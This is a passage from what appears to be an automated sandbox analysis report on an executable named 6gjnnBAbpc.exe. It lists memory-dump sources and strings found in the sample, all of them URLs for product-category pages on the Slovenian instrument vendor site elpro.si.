6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/potrosni-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/arhiv/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/datalog
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/dodatna
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/lastnov
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/merilni
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/monitor
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/prenosn
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/program
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/radiaci
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/registr
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/
